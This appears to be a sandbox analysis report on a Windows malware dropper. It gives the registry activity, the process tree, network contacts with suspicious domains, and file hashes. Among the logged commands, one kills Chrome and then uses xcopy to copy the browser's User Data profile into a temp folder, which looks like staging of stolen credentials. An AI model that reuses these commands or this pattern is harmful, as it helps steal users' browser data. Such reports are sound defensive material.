| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2532 -ip 2532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 564
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1016 -ip 1016
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 356
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 1136
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 172.67.75.166:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | | tcp |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 25.27.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| N/A | 127.0.0.1:62806 | | tcp |
| N/A | 127.0.0.1:62808 | | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| US | 8.8.8.8:53 | 239.2.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
| MD5 | aaaf685d045b423d4d96ecaca344b4d5 |
| SHA1 | f2264a40421e66029db1cdf7fe8bb8ada2614862 |
| SHA256 | f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8 |
| SHA512 | 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2532-29-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-33-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-32-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-62-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2532-61-0x0000000064941000-0x000000006494F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
| MD5 | 0f3487e49d6f3a5c1846cd9eebc7e3fc |
| SHA1 | 17ba797b3d36960790e7b983c432f81ffb9df709 |
| SHA256 | fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a |
| SHA512 | fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
memory/4480-92-0x00000000006E0000-0x00000000007CE000-memory.dmp
memory/4564-93-0x0000000000830000-0x000000000085C000-memory.dmp
memory/4564-96-0x00000000027C0000-0x00000000027E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
memory/4564-108-0x00000000027F0000-0x00000000027F6000-memory.dmp
memory/4188-109-0x0000000000F10000-0x0000000001052000-memory.dmp
memory/1308-105-0x0000000000990000-0x0000000000998000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
| MD5 | 7aaf005f77eea53dc227734db8d7090b |
| SHA1 | b6be1dde4cf73bbf0d47c9e07734e96b3442ed59 |
| SHA256 | a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71 |
| SHA512 | 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d |
memory/4564-94-0x0000000001000000-0x0000000001006000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
| MD5 | e2213d70937e476e7a778f1712912131 |
| SHA1 | f8f09b6965c83c361210a1b11c8039b7ca9a30b9 |
| SHA256 | 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b |
| SHA512 | cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
| MD5 | 77c7866632ae874b545152466fce77ad |
| SHA1 | f48e76c8478a139ea77c03238a0499cfa1fc8cea |
| SHA256 | e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43 |
| SHA512 | e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8 |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
| MD5 | 5c2e28dedae0e088fc1f9b50d7d28c12 |
| SHA1 | f521d9d8ae7381e3953ae5cf33b4b1b37f67a193 |
| SHA256 | 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f |
| SHA512 | f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
| MD5 | 46e9d76672b9d24ba14ea963574cc6a2 |
| SHA1 | caf88d470dc1241aca2b159b26953194a8d59cca |
| SHA256 | 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7 |
| SHA512 | 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6 |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
